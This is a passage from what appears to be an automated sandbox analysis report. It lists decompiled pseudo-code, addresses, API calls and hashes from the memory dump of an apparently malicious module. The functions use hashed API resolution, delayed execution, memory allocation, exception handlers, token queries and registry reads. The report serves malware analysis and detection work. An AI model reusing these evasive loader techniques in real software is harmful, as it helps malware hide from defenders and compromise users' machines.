				E72ADF558( &_v200, E72ADF568( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x9b42cb07;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v204, E72ADF568(_t385) + 0x10);
				E72ADF558( &_v208, E72ADF568( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E72AE413C(0xa5eabdf8, _t434);
				E72ADF558( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E72ADF558( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E72ADF558( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E72ADF558( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E72ADF558( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E72ADF558( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E72ADF558( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E72ADF558( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E72ADF558( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E72ADF558( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E72ADF558( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E72ADF558( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E72ADF558( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E72ADF558( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E72ADF558( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E72ADF558( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E72ADF558( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E72AD1D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E72ADB338( &_v248, _v256, _t481, _v252, _t318);
				E72ADF8DC( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xfb42c037;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v296, E72ADF568(_t410) + 0x10);
				E72ADF558( &_v300, E72ADF568( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x7082aaf3;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v304, E72ADF568(_t414) + 0x10);
				E72ADF558( &_v308, E72ADF568( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x1eeb5e35;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v312, E72ADF568(_t418) + 0x10);
				E72ADF558( &_v316, E72ADF568( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xe856fc47;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v320, E72ADF568(_t422) + 0x10);
				E72ADF558( &_v324, E72ADF568( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E72ADBAB8(_t154,  *_t480);
				E72ADF558( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0"); // executed
				E72ADF558( &_v344, 0x10); // executed
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E72ADF558( &_v348, "true");
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E72ADF558( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E72ADF6F0( &_v316);
				return E72ADF6F0( &_v356);
			}

0x72ad1494
0x72ad1498
0x72ad149d
0x72ad14a3
0x72ad14ab
0x72ad14b0
0x72ad14bc
0x72ad14c0
0x72ad14d2
0x72ad14e8
0x72ad14f3
0x72ad14f4
0x72ad14f5
0x72ad14f6
0x72ad14f7
0x72ad14fa
0x72ad14fe
0x72ad1502
0x72ad1509
0x72ad151b
0x72ad1531
0x72ad153c
0x72ad153d
0x72ad153e
0x72ad153f
0x72ad1540
0x72ad1543
0x72ad1547
0x72ad154b
0x72ad1552
0x72ad1564
0x72ad157a
0x72ad1585
0x72ad1586
0x72ad1587
0x72ad1588
0x72ad1589
0x72ad158c
0x72ad1590
0x72ad1594
0x72ad159b
0x72ad15ad
0x72ad15c3
0x72ad15ce
0x72ad15cf
0x72ad15d0
0x72ad15d1
0x72ad15d2
0x72ad15d5
0x72ad15d9
0x72ad15dd
0x72ad15e4
0x72ad15f6
0x72ad160c
0x72ad1617
0x72ad1618
0x72ad1619
0x72ad161a
0x72ad161b
0x72ad161e
0x72ad1622
0x72ad1626
0x72ad162d
0x72ad163f
0x72ad1655
0x72ad1660
0x72ad1661
0x72ad1662
0x72ad1663
0x72ad1664
0x72ad1667
0x72ad166b
0x72ad166f
0x72ad1676
0x72ad1688
0x72ad169e
0x72ad16a9
0x72ad16aa
0x72ad16ab
0x72ad16ac
0x72ad16ad
0x72ad16b0
0x72ad16b4
0x72ad16b8
0x72ad16bf
0x72ad16d1
0x72ad16e7
0x72ad16f2
0x72ad16f3
0x72ad16f4
0x72ad16f5
0x72ad16f6
0x72ad16f9
0x72ad16fd
0x72ad1701
0x72ad1708
0x72ad171a
0x72ad1730
0x72ad173b
0x72ad173c
0x72ad173d
0x72ad173e
0x72ad173f
0x72ad1742
0x72ad1746
0x72ad174a
0x72ad1751
0x72ad1763
0x72ad1779
0x72ad1784
0x72ad1785
0x72ad1786
0x72ad1787
0x72ad1788
0x72ad178b
0x72ad178f
0x72ad1793
0x72ad179a
0x72ad17ac
0x72ad17c2
0x72ad17cd
0x72ad17ce
0x72ad17cf
0x72ad17d0
0x72ad17d1
0x72ad17d4
0x72ad17d8
0x72ad17dc
0x72ad17e3
0x72ad17f5
0x72ad180b
0x72ad1816
0x72ad1817
0x72ad1818
0x72ad1819
0x72ad181a
0x72ad181d
0x72ad1821
0x72ad1825
0x72ad182c
0x72ad183e
0x72ad1854
0x72ad185f
0x72ad1860
0x72ad1861
0x72ad1862
0x72ad1863
0x72ad1866
0x72ad186a
0x72ad186e
0x72ad1875
0x72ad1887
0x72ad189d
0x72ad18a8
0x72ad18a9
0x72ad18aa
0x72ad18ab
0x72ad18ac
0x72ad18af
0x72ad18b3
0x72ad18b7
0x72ad18be
0x72ad18d0
0x72ad18e6
0x72ad18f1
0x72ad18f2
0x72ad18f3
0x72ad18f4
0x72ad18f5
0x72ad18f8
0x72ad18fc
0x72ad1900
0x72ad1907
0x72ad1919
0x72ad192f
0x72ad193a
0x72ad193b
0x72ad193c
0x72ad193d
0x72ad193e
0x72ad1941
0x72ad1945
0x72ad1949
0x72ad1950
0x72ad1962
0x72ad1978
0x72ad1983
0x72ad1984
0x72ad1985
0x72ad1986
0x72ad198c
0x72ad198f
0x72ad1991
0x72ad199c
0x72ad19a3
0x72ad19ac
0x72ad19b4
0x72ad19bb
0x72ad19c4
0x72ad19cc
0x72ad19d3
0x72ad19dc
0x72ad19e4
0x72ad19eb
0x72ad19f4
0x72ad19fc
0x72ad1a03
0x72ad1a0c
0x72ad1a14
0x72ad1a1b
0x72ad1a24
0x72ad1a2c
0x72ad1a36
0x72ad1a3f
0x72ad1a47
0x72ad1a51
0x72ad1a5a
0x72ad1a62
0x72ad1a6c
0x72ad1a75
0x72ad1a7d
0x72ad1a87
0x72ad1a90
0x72ad1a98
0x72ad1aa2
0x72ad1aab
0x72ad1ab3
0x72ad1abd
0x72ad1ac6
0x72ad1ace
0x72ad1ad8
0x72ad1ae1
0x72ad1ae9
0x72ad1af3
0x72ad1afc
0x72ad1b04
0x72ad1b0e
0x72ad1b17
0x72ad1b1f
0x72ad1b26
0x72ad1b2f
0x72ad1b37
0x72ad1b3e
0x72ad1b43
0x72ad1b51
0x72ad1b55
0x72ad1b64
0x72ad1b6d
0x72ad1b72
0x72ad1b79
0x72ad1b7d
0x72ad1b81
0x72ad1b88
0x72ad1b9a
0x72ad1bb0
0x72ad1bbb
0x72ad1bbc
0x72ad1bbd
0x72ad1bbe
0x72ad1bbf
0x72ad1bc2
0x72ad1bc6
0x72ad1bca
0x72ad1bd1
0x72ad1be3
0x72ad1bf9
0x72ad1c04
0x72ad1c05
0x72ad1c06
0x72ad1c07
0x72ad1c08
0x72ad1c0b
0x72ad1c0f
0x72ad1c13
0x72ad1c1a
0x72ad1c2c
0x72ad1c42
0x72ad1c4d
0x72ad1c4e
0x72ad1c4f
0x72ad1c50
0x72ad1c51
0x72ad1c54
0x72ad1c58
0x72ad1c5c
0x72ad1c63
0x72ad1c75
0x72ad1c8b
0x72ad1c96
0x72ad1c97
0x72ad1c98
0x72ad1c99
0x72ad1c9a
0x72ad1c9d
0x72ad1ca0
0x72ad1ca1
0x72ad1ca2
0x72ad1ca9
0x72ad1cac
0x72ad1cb7
0x72ad1cbe
0x72ad1cc7
0x72ad1ccf
0x72ad1cd6
0x72ad1cdf
0x72ad1ce7
0x72ad1cee
0x72ad1cf7
0x72ad1cff
0x72ad1d04
0x72ad1d0d
0x72ad1d15
0x72ad1d2a

Strings

$#,, xrefs: 72AD1701

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $#,
API String ID: 0-2557146312
Opcode ID: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction ID: ec7a5dc3b343efd4143518c459a38f4a1a9f8296aae5daab590124b33bb5cae0
Opcode Fuzzy Hash: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction Fuzzy Hash: 3D32D4724847069AC715DF28CD5099FBBB0AFA1301F10874DF499AA1BDFF71DA8AC641

Uniqueness

Uniqueness Score: -1.00%

Function 72AE218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E72AE218C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E72AE3A34(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E72AE2F94(0xa5eabdf8, 0xd48281c0, 0xa5eabdf8, 0xa5eabdf8);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x72ae218c
0x72ae2190
0x72ae21ac
0x72ae21af
0x72ae2192
0x72ae21a1
0x72ae21a4
0x72ae21a4
0x72ae21bf
0x72ae21c4
0x72ae21c8
0x72ae21d0
0x72ae21d0
0x72ae21d4

APIs

NtDelayExecution.NTDLL(00000000,00000000,A5EABDF8,A5EABDF8,FFFFFFFF,FFFFFFFF,72AD35C3,00000000,00000000,?), ref: 72AE21D0

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction ID: 066a09a94b133f023988ff5507716f65f57aafcba7581091650a7344fd5cd785
Opcode Fuzzy Hash: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction Fuzzy Hash: 3AE09BB094E341AFEB44972C8D42B3F7AE89F84711F20851DF557D62C8EA30D5468722

Uniqueness

Uniqueness Score: -1.00%

Function 72AE2790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72AE2790(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E72AE2F94(0xa5eabdf8, 0xc15ccc53, 0xa5eabdf8, 0xa5eabdf8) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x72ae2797
0x72ae27a0
0x72ae27ae
0x72ae27d1
0x72ae27d1
0x72ae27b0
0x72ae27c7
0x72ae27cb
0x00000000
0x72ae27cd
0x72ae27cd
0x72ae27cd
0x72ae27cb
0x72ae27d6

APIs

NtAllocateVirtualMemory.NTDLL(A5EABDF8,?,00000000,22DC1034,00000004,00000004,A5EABDF8,A5EABDF8,?,?,72AE8852,00003000,00000004,000000FF,A5EABDF8,22DC1034), ref: 72AE27C7

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction ID: 622bcfd0d44c4f645747149c1b93064e6c7fcd70c2e1c084912677a72a5915d5
Opcode Fuzzy Hash: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction Fuzzy Hash: 16E0A97160C382EFEB09CA28CC16E2BBBE8EF89300F108C1DB096C6114EB30C8519722

Uniqueness

Uniqueness Score: -1.00%

Function 72AE3060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E72AE3060(intOrPtr* __ecx) {
				void* _t1;

				_push(E72AE33D8);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x72ae3060
0x72ae3065
0x72ae3067
0x72ae3069

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,72AE33D8,72AE3050,A5EABDF8,A5EABDF8,?,72AD2530,00000001), ref: 72AE3067

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: d834a762b7d882e9b9810b7f0e844939bfa48a40f3f3c69df1db368244c4fe54
Instruction ID: a69dc73d55fee9c54ea47cb22fb55b8d6de1c85fa6f369fa6fcc3675b092eaea
Opcode Fuzzy Hash: d834a762b7d882e9b9810b7f0e844939bfa48a40f3f3c69df1db368244c4fe54
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 72AE1140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E72AE1140(void* __ecx, void* __edi, void* __esi) {
				long _v12;
				void* _v20;
				void* _v24;
				char _v32;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v64;
				int _t31;
				void* _t33;
				long* _t39;
				intOrPtr* _t46;
				void* _t54;
				void* _t56;
				void* _t58;
				long* _t59;

				_t59 = _t58 - 0x20;
				_t56 = __ecx;
				_v12 = 0;
				_t46 = E72AE2F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t46 != 0) {
					 *_t46(_t56, 8,  &_v12);
				}
				_t39 = _t59;
				 *_t39 = _v12;
				_t39[1] = 1;
				if(E72ADC33C(_t39) != 0) {
					L6:
					if(_t59[1] != 0) {
						E72ADBC00(_t59);
					}
					return 0;
				} else {
					_t59[6] = 0;
					if(E72AE2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t59[6])); // executed
					}
					_t24 = _t59[6];
					if(_t59[6] != 0) {
						E72ADF620( &_v32, _t24);
						_t54 = E72ADF558( &(_t59[3]), 0);
						if(E72AE2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
							L13:
							E72ADF6F0( &_v32);
							goto L6;
						} else {
							_t31 = GetTokenInformation(_v40, 0x19, _t54, _t59[7],  &(_t59[6])); // executed
							if(_t31 == 0) {
								goto L13;
							} else {
								_t33 = E72AE2F94(0xd0443458, 0x57bf3274, 0xd0443458, 0xd0443458);
								if(_t33 == 0) {
									goto L13;
								} else {
									_push( *_t54);
									asm("int3");
									return _t33;
								}
							}
						}
					} else {
						goto L6;
					}
				}
			}

0x72ae1142
0x72ae114f
0x72ae1151
0x72ae1160
0x72ae1164
0x72ae116e
0x72ae116e
0x72ae1174
0x72ae1177
0x72ae1179
0x72ae1184
0x72ae11be
0x72ae11c3
0x72ae11c8
0x72ae11c8
0x72ae11d4
0x72ae1186
0x72ae1190
0x72ae11a3
0x72ae11b4
0x72ae11b4
0x72ae11b6
0x72ae11bc
0x72ae11da
0x72ae11ea
0x72ae1201
0x72ae12e3
0x72ae12e7
0x00000000
0x72ae1207
0x72ae1217
0x72ae121b
0x00000000
0x72ae1221
0x72ae122d
0x72ae1234
0x00000000
0x72ae123a
0x72ae123a
0x72ae123c
0x72ae123d
0x72ae123d
0x72ae1234
0x72ae121b
0x00000000
0x00000000
0x00000000
0x72ae11bc

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 72AE11B4
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 72AE1217

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction ID: 08ffae6a67659859b5943135ab747080d8e68f04094a38fd5e0309819af09777
Opcode Fuzzy Hash: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction Fuzzy Hash: 3D219170A482427FEB05DA6CCD41FAB6AED9FD5304F10C86CB456D6168EF34C80AC761

Uniqueness

Uniqueness Score: -1.00%

Function 72AE5720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E72AE5720(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E72AE2F8C(0xd0443458, 0x91134e46) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E72ADF8C4(_a8, _t15);
							if(E72AE2F8C(0xd0443458, 0x91134e46) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E72ADF558(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x72ae5724
0x72ae5725
0x72ae5727
0x72ae572c
0x72ae5733
0x72ae5737
0x72ae5737
0x72ae5737
0x72ae573b
0x72ae5781
0x72ae5781
0x72ae573d
0x72ae573d
0x72ae5743
0x72ae574c
0x72ae574f
0x72ae5766
0x72ae5777
0x72ae5777
0x72ae5779
0x72ae577f
0x72ae578a
0x72ae57a2
0x72ae57c2
0x72ae57c2
0x72ae57c4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x72ae5743
0x72ae57cc

APIs

RegQueryValueExA.KERNELBASE(?,72AED1F8,00000000,?,00000000,00000000,?,?,?,72AED1F8,?,72AE57F3,?,00000000,00000000), ref: 72AE5777
RegQueryValueExA.KERNELBASE(?,72AED1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,72AED1F8,?,72AE57F3,?,00000000), ref: 72AE57C2

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction ID: ca454fafbf5bb51b7b67fe4ba4a26aa5eb91c4c9155d945f8dc93b90e031fad6
Opcode Fuzzy Hash: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction Fuzzy Hash: 4011B471A08315FFEA259E29ECC2F6BBBECDF49758F00481DF48797148DA20E8129661

Uniqueness

Uniqueness Score: -1.00%

Function 72AE5AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E72AE5AA8(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t21;
				void* _t24;
				void* _t29;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t56;
				WCHAR** _t58;
				char* _t64;
				void* _t65;
				long _t66;

				_push(0);
				_push(_t62);
				_t66 = _t65 - 0x10;
				_t58 = __ecx;
				_t37 = _a8;
				if(E72ADD288(__ecx, 0x2f) != 0) {
					_t62 = _t66;
					E72ADD78C(__ecx, _t66);
					E72ADD0B4(_t58,  *_t66);
					E72ADD098(_t66);
				}
				if(_t37 == 0) {
					_t70 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E72AE621C(_t70);
				if(_a4 <= 5) {
					goto __eax;
				}
				_t62 = 0;
				if(_t37 != 2) {
					_t16 = 3;
					__eflags = _t37 - 1;
					_t38 = 0;
					_t39 =  ==  ? _t16 : _t38;
				} else {
					_t39 = 1;
				}
				if(E72AE2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t29 = CreateFileW( *_t58, 0, _t39, 0, _t62, _a12, 0); // executed
					_push(_t29);
				}
				_t40 =  &(_t58[3]);
				E72ADC328(_t40);
				if(E72ADC33C(_t40) != 0) {
					_t58[2] = E72AE352C(0);
					_t21 = 0;
					goto L19;
				} else {
					if(_a4 == 2) {
						_t56 = E72AE2F8C(0x4bcc7cba, 0xceed09cc);
						__eflags = _t56;
						if(_t56 != 0) {
							 *_t56( *_t40, 0, 0, 2);
						}
					}
					_t64 =  &_v24;
					E72AE35D4(_t64, 0xff, 8);
					_t66 = _t66 + 0xc;
					_t24 = E72AE2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t24 == 0) {
						_t21 = 1;
						__eflags = 1;
						L19:
						return _t21;
					} else {
						_push(_t64);
						_push(_t64);
						_push(0);
						_push( *_t40);
						asm("int3");
						return _t24;
					}
				}
			}

0x72ae5aa8
0x72ae5aab
0x72ae5aac
0x72ae5aaf
0x72ae5ab1
0x72ae5abe
0x72ae5ac2
0x72ae5ac6
0x72ae5ad0
0x72ae5ad7
0x72ae5ad7
0x72ae5ade
0x72ae5ae0
0x72ae5ae5
0x72ae5aee
0x72ae5af6
0x72ae5af6
0x72ae5ae7
0x72ae5ae9
0x72ae5ae9
0x72ae5ae5
0x72ae5afb
0x72ae5b07
0x72ae5b1d
0x72ae5b1d
0x72ae5c38
0x72ae5b75
0x72ae5b7e
0x72ae5b7f
0x72ae5b84
0x72ae5b85
0x72ae5b77
0x72ae5b79
0x72ae5b79
0x72ae5b9b
0x72ae5baf
0x72ae5b9d
0x72ae5baa
0x72ae5bac
0x72ae5bac
0x72ae5bb1
0x72ae5bb6
0x72ae5bc4
0x72ae5c2f
0x72ae5c32
0x00000000
0x72ae5bc6
0x72ae5bcb
0x72ae5c18
0x72ae5c1a
0x72ae5c1c
0x72ae5c26
0x72ae5c26
0x72ae5c1c
0x72ae5bcd
0x72ae5bd9
0x72ae5bde
0x72ae5beb
0x72ae5bf2
0x72ae5bfe
0x72ae5bfe
0x72ae5bff
0x72ae5c06
0x72ae5bf4
0x72ae5bf4
0x72ae5bf5
0x72ae5bf6
0x72ae5bf8
0x72ae5bfa
0x72ae5bfb
0x72ae5bfb
0x72ae5bf2

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccc31e697c243825c2f2bf0e7a7e76937897f9046cef71b7ecd0e0728e946a1f
Instruction ID: 124b77c64977d110cfd9a12fd3292ee6a600d9234f380131dc70d7243293dc8d
Opcode Fuzzy Hash: ccc31e697c243825c2f2bf0e7a7e76937897f9046cef71b7ecd0e0728e946a1f
Instruction Fuzzy Hash: FC310871B84306AEDF11267D9DD6F3B7BAAEBC5204F00092DF6439609DEA618817C235

Uniqueness

Uniqueness Score: -1.00%

Function 72AE5B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E72AE5B51(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t21;
				void* _t22;
